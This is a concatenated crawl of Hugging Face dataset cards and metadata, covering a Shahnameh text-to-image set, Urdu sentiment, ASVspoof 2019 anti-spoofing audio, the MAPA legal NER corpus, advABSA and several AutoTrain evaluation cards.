Images corresponding to the same paragraphs have the same `id` field. There was a human annotation post-process in which we removed some harmful/private generated images from the dataset. After all we reached to more than 30K, 256 * 256 images. ### Supported Tasks and Leaderboards The main purpose of making this dataset open source is because of its artistic value, but it can also be used for the below tasks: + text-to-image + image-to-text (image captioning) ### Languages The Shahnameh was generally written in Farsi (Persian) but the translated version we used for this dataset - [satoor](https://www.sattor.com/english/Shahnameh.pdf) - was completely in English with no alignments for the corresponding Farsi poem. We are planning to add another field to dataset entries which is the corresponding Farsi poem as soon as possible. ## Dataset Structure ### Data Fields Here is an instance of our dataset: ```json { "image": <PIL Image Bytes>, "id": 0, "text": "He took up his abode in the mountains, and clad himself and his people in tiger-skins, and from him sprang all kindly nurture and the arts of clothing, till then unknown." } ``` + `image`: the image for given text. + `id`: the id for the text (**Not for the image**). + `text`: the English text for the image. ### Data Splits This dataset has only a split (`train` split). ## Dataset Creation The translated version of the Shahnameh was generally derived from the [satoor](https://www.sattor.com/english/Shahnameh.pdf) website. We first extracted texts from the pdf. After that, we divided paragraphs into sentences and give each sentence to the DALL-E mini model through its online API. It generated nine images for each sentence. After a few annotations, we came up with more than 30000 images. ### Annotations #### Annotation process Through the process of image generation, we noticed a bias in the DALL-E models towards the word `iran`. 
It was biased so that each sentence with this given word would have pictures from Iran's political figures which were usually totally irrelevant. The annotation process mainly focused to deal with these pictures. We removed those images which seems to be harmful to those figures and/or were irrelevant to the context. #### Who are the annotators? Mahsa Namdar and Sadra Sabouri were the annotators of this dataset. ### Personal and Sensitive Information Since the textual data is easily downloadable and the images were generated through an image generation model there shouldn't be any personal information in this dataset. Just in case you find something harmful or violating of one's personal information please let us know. We will take proper action as soon as possible. ## Considerations for Using the Data ### Social Impact of Dataset This dataset is mainly aimed to release for its artistic value. The process of generating images for the Shahnameh - which is one of the most important Farsi poem books - is our precious contribution. This dataset is not only used for this purpose but also can as a dataset in image-to-text and text-to-image tasks. ### Discussion of Biases The dataset's possible biases would come from the DALL-E mini biases. It's actually a good practice to check the dataset entries in order to find biases in that model. One it's worth mentioning in this work is the DALL-E mini model's bias for the word `iran` which nearly always comes up with images from political figures of this country. ### Other Known Limitations There are constant debates in the literature about the limitations of machine-generated datasets. Some believe that since nowadays models are not perfect - and so do their output, it wouldn't be a good idea to use these artificially generated datasets as input to the new model. They suggest that by doing so we are actually limiting our accuracy by the model's accuracy which provided the primary dataset. 
## Additional Information ### Dataset Curators + Emad Fatemizadeh: The general idea for generating a graphical version of Farsi poems was firstly introduced by him. + Sadra Sabouri: He looked up a translated version of the Shahnameh, extract and tokenized poems from it, and used the online DALL-E mini API to generate images from poems. + Mahsa Namdar: The process of annotation as a post-process on data has been held by her. ### Licensing Information MIT ### Citation Information [More Information Needed] ### Contributions Thanks to [@sadrasabouri](https://github.com/sadrasabouri) for adding this dataset.
hassan4830
null
null
null
false
1
false
hassan4830/urdu-binary-classification-data
2022-07-21T09:40:56.000Z
null
false
a5057855c7aa264709b35de7bd85258d943bec22
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/hassan4830/urdu-binary-classification-data/resolve/main/README.md
--- license: afl-3.0 --- This Urdu sentiment dataset was formed by concatenating the following two datasets: https://github.com/MuhammadYaseenKhan/Urdu-Sentiment-Corpus https://www.kaggle.com/datasets/akkefa/imdb-dataset-of-50k-movie-translated-urdu-reviews
SakaiJun
null
null
null
false
1
false
SakaiJun/github-issues
2022-07-20T07:37:59.000Z
null
false
59519e655088aa83999037b3ba8fa88d77eb3b83
[]
[]
https://huggingface.co/datasets/SakaiJun/github-issues/resolve/main/README.md
annotations_creators: [] language: - en language_creators: [] license: [] multilinguality: [] pretty_name: HuggingFace GitHub Issues size_categories: [] source_datasets: [] tags: [] task_categories: - text-classification - text-retrieval task_ids: - multi-class-classification - multi-label-classification - document-retrieval
arize-ai
null
# @InProceedings{huggingface:dataset, # title = {A great new dataset}, # author={huggingface, Inc. # }, # year={2020} # } #
This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on product reviews from an e-commerce store. The reviews are labeled on a scale from 1 to 5 (stars). The training & validation sets are fully composed by reviews written in english. However, the production set has some reviews written in spanish. At Arize, we work to surface this issue and help you solve it.
false
8
false
arize-ai/fashion_mnist_quality_drift
2022-10-25T10:40:17.000Z
null
false
fd526b15b744502f4e24b21126f543d845a8c59e
[]
[ "annotations_creators:expert-generated", "language_creators:expert-generated", "language:en", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:extended|imdb", "task_categories:image-classification", "task_ids:multi-class-classification" ]
https://huggingface.co/datasets/arize-ai/fashion_mnist_quality_drift/resolve/main/README.md
--- annotations_creators: - expert-generated language_creators: - expert-generated language: - en license: - mit multilinguality: - monolingual size_categories: - 10K<n<100K source_datasets: - extended|imdb task_categories: - image-classification task_ids: - multi-class-classification pretty_name: sentiment-classification-reviews-with-drift --- # Dataset Card for `reviews_with_drift` ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description ### Dataset Summary This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on a large Movie Review Dataset mixed with some reviews from a Hotel Review Dataset. The training/validation set are purely obtained from the Movie Review Dataset while the production set is mixed. Some other features have been added (`age`, `gender`, `context`) as well as a made up timestamp `prediction_ts` of when the inference took place. 
### Supported Tasks and Leaderboards `text-classification`, `sentiment-classification`: The dataset is mainly used for text classification: given the text, predict the sentiment (positive or negative). ### Languages Text is mainly written in english. ## Dataset Structure ### Data Instances [More Information Needed] ### Data Fields [More Information Needed] ### Data Splits [More Information Needed] ## Dataset Creation ### Curation Rationale [More Information Needed] ### Source Data [More Information Needed] #### Initial Data Collection and Normalization [More Information Needed] #### Who are the source language producers? [More Information Needed] ### Annotations [More Information Needed] #### Annotation process [More Information Needed] #### Who are the annotators? [More Information Needed] ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators [More Information Needed] ### Licensing Information [More Information Needed] ### Citation Information [More Information Needed] ### Contributions Thanks to [@fjcasti1](https://github.com/fjcasti1) for adding this dataset.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-xsum-6cd6bf3a-11245505
2022-07-20T07:53:57.000Z
null
false
8116d3b3bedf70dcc6f755e461f5ab499ef13e18
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:xsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-xsum-6cd6bf3a-11245505/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - xsum eval_info: task: summarization model: ARTeLab/it5-summarization-ilpost metrics: [] dataset_name: xsum dataset_config: default dataset_split: test col_mapping: text: document target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: ARTeLab/it5-summarization-ilpost * Dataset: xsum * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@dishant16](https://huggingface.co/dishant16) for evaluating this model.
voidful
null
null
null
false
1
false
voidful/DRCD
2022-07-20T08:33:48.000Z
null
false
591e29480dfe46d7247cbe2e9d582ec97b8fb11e
[]
[ "license:cc-by-3.0" ]
https://huggingface.co/datasets/voidful/DRCD/resolve/main/README.md
--- license: cc-by-3.0 ---
LanceaKing
null
@InProceedings{Todisco2019, Title = {{ASV}spoof 2019: {F}uture {H}orizons in {S}poofed and {F}ake {A}udio {D}etection}, Author = {Todisco, Massimiliano and Wang, Xin and Sahidullah, Md and Delgado, H ́ector and Nautsch, Andreas and Yamagishi, Junichi and Evans, Nicholas and Kinnunen, Tomi and Lee, Kong Aik}, booktitle = {Proc. of Interspeech 2019}, Year = {2019} }
This is a database used for the Third Automatic Speaker Verification Spoofing and Countermeasuers Challenge, for short, ASVspoof 2019 (http://www.asvspoof.org) organized by Junichi Yamagishi, Massimiliano Todisco, Md Sahidullah, Héctor Delgado, Xin Wang, Nicholas Evans, Tomi Kinnunen, Kong Aik Lee, Ville Vestman, and Andreas Nautsch in 2019.
false
353
false
LanceaKing/asvspoof2019
2022-11-11T08:41:54.000Z
null
false
9e3c700a884eb823b3b6c9bd993f3197cdfdacb6
[]
[ "arxiv:1911.01601", "annotations_creators:other", "language_creators:other", "language:en", "license:odc-by", "multilinguality:monolingual", "size_categories:100K<n<1M", "source_datasets:extended|vctk", "task_categories:audio-classification", "tags:voice-anti-spoofing" ]
https://huggingface.co/datasets/LanceaKing/asvspoof2019/resolve/main/README.md
--- annotations_creators: - other language_creators: - other language: - en license: - odc-by multilinguality: - monolingual size_categories: - 100K<n<1M source_datasets: - extended|vctk task_categories: - audio-classification task_ids: [] pretty_name: asvspoof2019 tags: - voice-anti-spoofing --- # Dataset Card for asvspoof2019 ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** https://datashare.ed.ac.uk/handle/10283/3336 - **Repository:** [Needs More Information] - **Paper:** https://arxiv.org/abs/1911.01601 - **Leaderboard:** [Needs More Information] - **Point of Contact:** [Needs More Information] ### Dataset Summary This is a database used for the Third Automatic Speaker Verification Spoofing and Countermeasuers Challenge, for short, ASVspoof 2019 (http://www.asvspoof.org) organized by Junichi Yamagishi, Massimiliano Todisco, Md Sahidullah, Héctor Delgado, Xin Wang, Nicholas Evans, Tomi Kinnunen, Kong Aik Lee, Ville Vestman, and Andreas Nautsch in 2019. 
### Supported Tasks and Leaderboards [Needs More Information] ### Languages English ## Dataset Structure ### Data Instances ``` {'speaker_id': 'LA_0091', 'audio_file_name': 'LA_T_8529430', 'audio': {'path': 'D:/Users/80304531/.cache/huggingface/datasets/downloads/extracted/8cabb6d5c283b0ed94b2219a8d459fea8e972ce098ef14d8e5a97b181f850502/LA/ASVspoof2019_LA_train/flac/LA_T_8529430.flac', 'array': array([-0.00201416, -0.00234985, -0.0022583 , ..., 0.01309204, 0.01339722, 0.01461792], dtype=float32), 'sampling_rate': 16000}, 'system_id': 'A01', 'key': 1} ``` ### Data Fields Logical access (LA): - `speaker_id`: `LA_****`, a 4-digit speaker ID - `audio_file_name`: name of the audio file - `audio`: A dictionary containing the path to the downloaded audio file, the decoded audio array, and the sampling rate. Note that when accessing the audio column: `dataset[0]["audio"]` the audio file is automatically decoded and resampled to `dataset.features["audio"].sampling_rate`. Decoding and resampling of a large number of audio files might take a significant amount of time. Thus it is important to first query the sample index before the `"audio"` column, *i.e.* `dataset[0]["audio"]` should **always** be preferred over `dataset["audio"][0]`. - `system_id`: ID of the speech spoofing system (A01 - A19), or, for bonafide speech SYSTEM-ID is left blank ('-') - `key`: 'bonafide' for genuine speech, or, 'spoof' for spoofing speech Physical access (PA): - `speaker_id`: `PA_****`, a 4-digit speaker ID - `audio_file_name`: name of the audio file - `audio`: A dictionary containing the path to the downloaded audio file, the decoded audio array, and the sampling rate. Note that when accessing the audio column: `dataset[0]["audio"]` the audio file is automatically decoded and resampled to `dataset.features["audio"].sampling_rate`. Decoding and resampling of a large number of audio files might take a significant amount of time. 
Thus it is important to first query the sample index before the `"audio"` column, *i.e.* `dataset[0]["audio"]` should **always** be preferred over `dataset["audio"][0]`. - `environment_id`: a triplet (S,R,D_s), which take one letter in the set {a,b,c} as categorical value, defined as | | a | b | c | | -------------------------------- | ------ | ------- | -------- | | S: Room size (square meters) | 2-5 | 5-10 | 10-20 | | R: T60 (ms) | 50-200 | 200-600 | 600-1000 | | D_s: Talker-to-ASV distance (cm) | 10-50 | 50-100 | 100-150 | - `attack_id`: a duple (D_a,Q), which take one letter in the set {A,B,C} as categorical value, defined as | | A | B | C | | ----------------------------------- | ------- | ------ | ----- | | Z: Attacker-to-talker distance (cm) | 10-50 | 50-100 | > 100 | | Q: Replay device quality | perfect | high | low | for bonafide speech, `attack_id` is left blank ('-') - `key`: 'bonafide' for genuine speech, or, 'spoof' for spoofing speech ### Data Splits | | Training set | Development set | Evaluation set | | -------- | ------------ | --------------- | -------------- | | Bonafide | 2580 | 2548 | 7355 | | Spoof | 22800 | 22296 | 63882 | | Total | 25380 | 24844 | 71237 | ## Dataset Creation ### Curation Rationale [Needs More Information] ### Source Data #### Initial Data Collection and Normalization [Needs More Information] #### Who are the source language producers? [Needs More Information] ### Annotations #### Annotation process [Needs More Information] #### Who are the annotators? 
[Needs More Information] ### Personal and Sensitive Information [Needs More Information] ## Considerations for Using the Data ### Social Impact of Dataset [Needs More Information] ### Discussion of Biases [Needs More Information] ### Other Known Limitations [Needs More Information] ## Additional Information ### Dataset Curators [Needs More Information] ### Licensing Information This ASVspoof 2019 dataset is made available under the Open Data Commons Attribution License: http://opendatacommons.org/licenses/by/1.0/ ### Citation Information ``` @InProceedings{Todisco2019, Title = {{ASV}spoof 2019: {F}uture {H}orizons in {S}poofed and {F}ake {A}udio {D}etection}, Author = {Todisco, Massimiliano and Wang, Xin and Sahidullah, Md and Delgado, H ́ector and Nautsch, Andreas and Yamagishi, Junichi and Evans, Nicholas and Kinnunen, Tomi and Lee, Kong Aik}, booktitle = {Proc. of Interspeech 2019}, Year = {2019} } ```
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-emotion-5a29f55d-11295506
2022-07-20T11:04:02.000Z
null
false
468d0b8716ec40f521f557a4617039975a3a16e4
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:emotion" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-emotion-5a29f55d-11295506/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - emotion eval_info: task: multi_class_classification model: Abdelrahman-Rezk/distilbert-base-uncased-finetuned-emotion metrics: ['bertscore'] dataset_name: emotion dataset_config: default dataset_split: validation col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: Abdelrahman-Rezk/distilbert-base-uncased-finetuned-emotion * Dataset: emotion * Config: default * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
legotin
null
null
null
false
2
false
legotin/movielens-1m-ratings-standardized
2022-07-20T13:58:58.000Z
null
false
f9189e3914ce04ed0d10de11d38c145c6ee58385
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/legotin/movielens-1m-ratings-standardized/resolve/main/README.md
--- license: apache-2.0 ---
joelito
null
null
null
false
2,332
false
joelito/mapa
2022-10-25T16:17:09.000Z
null
false
bbb2a0157b760465002fd12a61af81b475cd387a
[]
[ "annotations_creators:other", "language_creators:found", "language:multilingual", "language:bg", "language:cs", "language:da", "language:de", "language:el", "language:en", "language:es", "language:et", "language:fi", "language:fr", "language:ga", "language:hu", "language:it", "langua...
https://huggingface.co/datasets/joelito/mapa/resolve/main/README.md
--- annotations_creators: - other language_creators: - found language: - multilingual - bg - cs - da - de - el - en - es - et - fi - fr - ga - hu - it - lt - lv - mt - nl - pt - ro - sk - sv license: - cc-by-4.0 multilinguality: - multilingual size_categories: - 1K<n<10K source_datasets: - original task_categories: - token-classification task_ids: - named-entity-recognition pretty_name: Spanish Datasets for Sensitive Entity Detection in the Legal Domain tags: - named-entity-recognition-and-classification --- # Dataset Card for Multilingual European Datasets for Sensitive Entity Detection in the Legal Domain ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Homepage:** - ** Repository:** [Spanish](https://elrc-share.eu/repository/browse/mapa-anonymization-package-spanish/b550e1a88a8311ec9c1a00155d026706687917f92f64482587c6382175dffd76/), 
[Most](https://elrc-share.eu/repository/search/?q=mfsp:3222a6048a8811ec9c1a00155d0267067eb521077db54d6684fb14ce8491a391), [German, Portuguese, Slovak, Slovenian, Swedish](https://elrc-share.eu/repository/search/?q=mfsp:833df1248a8811ec9c1a00155d0267067685dcdb77064822b51cc16ab7b81a36) - **Paper:** de Gibert Bonet, O., García Pablos, A., Cuadros, M., & Melero, M. (2022). Spanish Datasets for Sensitive Entity Detection in the Legal Domain. Proceedings of the Language Resources and Evaluation Conference, June, 3751–3760. http://www.lrec-conf.org/proceedings/lrec2022/pdf/2022.lrec-1.400.pdf - **Leaderboard:** - **Point of Contact:** [Joel Niklaus](mailto:joel.niklaus.2@bfh.ch) ### Dataset Summary The dataset consists of 12 documents (9 for Spanish due to parsing errors) taken from EUR-Lex, a multilingual corpus of court decisions and legal dispositions in the 24 official languages of the European Union. The documents have been annotated for named entities following the guidelines of the [MAPA project]( https://mapa-project.eu/) which foresees two annotation level, a general and a more fine-grained one. The annotated corpus can be used for named entity recognition/classification. ### Supported Tasks and Leaderboards The dataset supports the task of Named Entity Recognition and Classification (NERC). ### Languages The following languages are supported: bg, cs, da, de, el, en, es, et, fi, fr, ga, hu, it, lt, lv, mt, nl, pt, ro, sk, sv ## Dataset Structure ### Data Instances The file format is jsonl and three data splits are present (train, validation and test). Named Entity annotations are non-overlapping. ### Data Fields For the annotation the documents have been split into sentences. The annotations has been done on the token level. The files contain the following data fields - `language`: language of the sentence - `type`: The document type of the sentence. Currently, only EUR-LEX is supported. - `file_name`: The document file name the sentence belongs to. 
- `sentence_number`: The number of the sentence inside its document. - `tokens`: The list of tokens in the sentence. - `coarse_grained`: The coarse-grained annotations for each token - `fine_grained`: The fine-grained annotations for each token As previously stated, the annotation has been conducted on a global and a more fine-grained level. The tagset used for the global and the fine-grained named entities is the following: - Address - Building - City - Country - Place - Postcode - Street - Territory - Amount - Unit - Value - Date - Year - Standard Abbreviation - Month - Day of the Week - Day - Calender Event - Person - Age - Email - Ethnic Category - Family Name - Financial - Given Name – Female - Given Name – Male - Health Insurance Number - ID Document Number - Initial Name - Marital Status - Medical Record Number - Nationality - Profession - Role - Social Security Number - Title - Url - Organisation - Time - Vehicle - Build Year - Colour - License Plate Number - Model - Type The final coarse grained tagset (in IOB notation) is the following: `['O', 'B-ORGANISATION', 'I-ORGANISATION', 'B-ADDRESS', 'I-ADDRESS', 'B-DATE', 'I-DATE', 'B-PERSON', 'I-PERSON', 'B-AMOUNT', 'I-AMOUNT', 'B-TIME', 'I-TIME']` The final fine grained tagset (in IOB notation) is the following: `[ 'O', 'B-BUILDING', 'I-BUILDING', 'B-CITY', 'I-CITY', 'B-COUNTRY', 'I-COUNTRY', 'B-PLACE', 'I-PLACE', 'B-TERRITORY', 'I-TERRITORY', 'I-UNIT', 'B-UNIT', 'B-VALUE', 'I-VALUE', 'B-YEAR', 'I-YEAR', 'B-STANDARD ABBREVIATION', 'I-STANDARD ABBREVIATION', 'B-MONTH', 'I-MONTH', 'B-DAY', 'I-DAY', 'B-AGE', 'I-AGE', 'B-ETHNIC CATEGORY', 'I-ETHNIC CATEGORY', 'B-FAMILY NAME', 'I-FAMILY NAME', 'B-INITIAL NAME', 'I-INITIAL NAME', 'B-MARITAL STATUS', 'I-MARITAL STATUS', 'B-PROFESSION', 'I-PROFESSION', 'B-ROLE', 'I-ROLE', 'B-NATIONALITY', 'I-NATIONALITY', 'B-TITLE', 'I-TITLE', 'B-URL', 'I-URL', 'B-TYPE', 'I-TYPE', ]` ### Data Splits Splits created by Joel Niklaus. 
| language | # train files | # validation files | # test files | # train sentences | # validation sentences | # test sentences | |:-----------|----------------:|---------------------:|---------------:|--------------------:|-------------------------:|-------------------:| | bg | 9 | 1 | 2 | 1411 | 166 | 560 | | cs | 9 | 1 | 2 | 1464 | 176 | 563 | | da | 9 | 1 | 2 | 1455 | 164 | 550 | | de | 9 | 1 | 2 | 1457 | 166 | 558 | | el | 9 | 1 | 2 | 1529 | 174 | 584 | | en | 9 | 1 | 2 | 893 | 98 | 408 | | es | 7 | 1 | 1 | 806 | 248 | 155 | | et | 9 | 1 | 2 | 1391 | 163 | 516 | | fi | 9 | 1 | 2 | 1398 | 187 | 531 | | fr | 9 | 1 | 2 | 1297 | 97 | 490 | | ga | 9 | 1 | 2 | 1383 | 165 | 515 | | hu | 9 | 1 | 2 | 1390 | 171 | 525 | | it | 9 | 1 | 2 | 1411 | 162 | 550 | | lt | 9 | 1 | 2 | 1413 | 173 | 548 | | lv | 9 | 1 | 2 | 1383 | 167 | 553 | | mt | 9 | 1 | 2 | 937 | 93 | 442 | | nl | 9 | 1 | 2 | 1391 | 164 | 530 | | pt | 9 | 1 | 2 | 1086 | 105 | 390 | | ro | 9 | 1 | 2 | 1480 | 175 | 557 | | sk | 9 | 1 | 2 | 1395 | 165 | 526 | | sv | 9 | 1 | 2 | 1453 | 175 | 539 | ## Dataset Creation ### Curation Rationale *„[…] to our knowledge, there exist no open resources annotated for NERC [Named Entity Recognition and Classificatio] in Spanish in the legal domain. With the present contribution, we intend to fill this gap. With the release of the created resources for fine-tuning and evaluation of sensitive entities detection in the legal domain, we expect to encourage the development of domain-adapted anonymisation tools for Spanish in this field“* (de Gibert Bonet et al., 2022) ### Source Data #### Initial Data Collection and Normalization The dataset consists of documents taken from EUR-Lex corpus which is publicly available. No further information on the data collection process are given in de Gibert Bonet et al. (2022). #### Who are the source language producers? The source language producers are presumably lawyers. 
### Annotations #### Annotation process *"The annotation scheme consists of a complex two level hierarchy adapted to the legal domain, it follows the scheme described in (Gianola et al., 2020) […] Level 1 entities refer to general categories (PERSON, DATE, TIME, ADDRESS...) and level 2 entities refer to more fine-grained subcategories (given name, personal name, day, year, month...). Eur-Lex, CPP and DE have been annotated following this annotation scheme […] The manual annotation was performed using INCePTION (Klie et al., 2018) by a sole annotator following the guidelines provided by the MAPA consortium."* (de Gibert Bonet et al., 2022) #### Who are the annotators? Only one annotator conducted the annotation. More information are not provdided in de Gibert Bonet et al. (2022). ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations Note that the dataset at hand presents only a small portion of a bigger corpus as described in de Gibert Bonet et al. (2022). At the time of writing only the annotated documents from the EUR-Lex corpus were available. Note that the information given in this dataset card refer to the dataset version as provided by Joel Niklaus and Veton Matoshi. The dataset at hand is intended to be part of a bigger benchmark dataset. Creating a benchmark dataset consisting of several other datasets from different sources requires postprocessing. Therefore, the structure of the dataset at hand, including the folder structure, may differ considerably from the original dataset. In addition to that, differences with regard to dataset statistics as give in the respective papers can be expected. The reader is advised to have a look at the conversion script ```convert_to_hf_dataset.py``` in order to retrace the steps for converting the original dataset into the present jsonl-format. 
For further information on the original dataset structure, we refer to the bibliographical references and the original Github repositories and/or web pages provided in this dataset card. ## Additional Information ### Dataset Curators The names of the original dataset curators and creators can be found in references given below, in the section *Citation Information*. Additional changes were made by Joel Niklaus ([Email](mailto:joel.niklaus.2@bfh.ch) ; [Github](https://github.com/joelniklaus)) and Veton Matoshi ([Email](mailto:veton.matoshi@bfh.ch) ; [Github](https://github.com/kapllan)). ### Licensing Information [Attribution 4.0 International (CC BY 4.0) ](https://creativecommons.org/licenses/by/4.0/) ### Citation Information ``` @article{DeGibertBonet2022, author = {{de Gibert Bonet}, Ona and {Garc{\'{i}}a Pablos}, Aitor and Cuadros, Montse and Melero, Maite}, journal = {Proceedings of the Language Resources and Evaluation Conference}, number = {June}, pages = {3751--3760}, title = {{Spanish Datasets for Sensitive Entity Detection in the Legal Domain}}, url = {https://aclanthology.org/2022.lrec-1.400}, year = {2022} } ``` ### Contributions Thanks to [@JoelNiklaus](https://github.com/joelniklaus) and [@kapllan](https://github.com/kapllan) for adding this dataset.
becurrio
null
null
null
false
1
false
becurrio/advABSA
2022-07-21T05:57:48.000Z
null
false
e4d8ebdbd6644c78caac2655731820a7e07fd298
[]
[ "arxiv:2207.08099", "license:apache-2.0" ]
https://huggingface.co/datasets/becurrio/advABSA/resolve/main/README.md
--- license: apache-2.0 --- ## advABSA An adversarial aspect-based sentiment analysis (ABSA) benchmark, dubbed [*adv*ABSA](https://arxiv.org/pdf/2207.08099.pdf) for both aspect-based sentiment classification (SC) and opinion extraction (OE). ### *adv*ABSA (Adversarial ABSA Benchmark) In response to the concerning robustness issue of ABSA, [Arts](https://aclanthology.org/2020.emnlp-main.292.pdf) is proposed, which contains datasets crafted only for adversarial evaluation on SC but not for OE. So we additionally craft datasets for adversarial evaluation on OE following their track. These gathered datasets form *adv*ABSA. That is, *adv*ABSA can be decomposed into two parts, where the first part is Arts-\[domain\]-SC reused from Arts and the second part is Arts-\[domain\]-OE newly produced by us. ### *std*ABSA (Standard ABSA Benchmark) In addition, we also provide *std*ABSA containing datasets from SemEval14 for standard evaluation, namely Sem14-\[domain\]-SC and Sem14-\[domain\]-OE. So corresponding performance drops can be measured properly. ### Citation If you find *adv*ABSA useful, please kindly star this repository and cite our paper as follows: ```bibtex @inproceedings{ma-etal-2022-aspect, title = "Aspect-specific Context Modeling for Aspect-based Sentiment Analysis", author = "Ma, Fang and Zhang, Chen and Zhang, Bo and Song, Dawei", booktitle = "NLPCC", month = "sep", year = "2022", address = "Guilin, China", url = "https://arxiv.org/pdf/2207.08099.pdf", } ``` ### Credits The benchmark is mainly processed by [Fang Ma](https://github.com/BD-MF).
autoevaluate
null
null
null
false
2
false
autoevaluate/autoeval-staging-eval-project-xsum-8015d52c-11325509
2022-07-20T17:31:44.000Z
null
false
88226971c2c3968d9bcef3eea281995c0313f108
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:xsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-xsum-8015d52c-11325509/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - xsum eval_info: task: summarization model: tuner007/pegasus_summarizer metrics: ['accuracy'] dataset_name: xsum dataset_config: default dataset_split: test col_mapping: text: document target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: tuner007/pegasus_summarizer * Dataset: xsum * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Neez](https://huggingface.co/Neez) for evaluating this model.
munggok
null
null
null
false
1
false
munggok/Laion_Indo
2022-07-21T20:53:47.000Z
null
false
542809bd6760d004fc0180ba3000ff3f80d29801
[]
[ "arxiv:2111.02114", "annotations_creators:found", "language_creators:found", "language:id", "license:cc-by-sa-4.0", "multilinguality:monolingual", "size_categories:10M<n<100M", "source_datasets:original", "task_categories:image-to-text", "task_ids:image-captioning" ]
https://huggingface.co/datasets/munggok/Laion_Indo/resolve/main/README.md
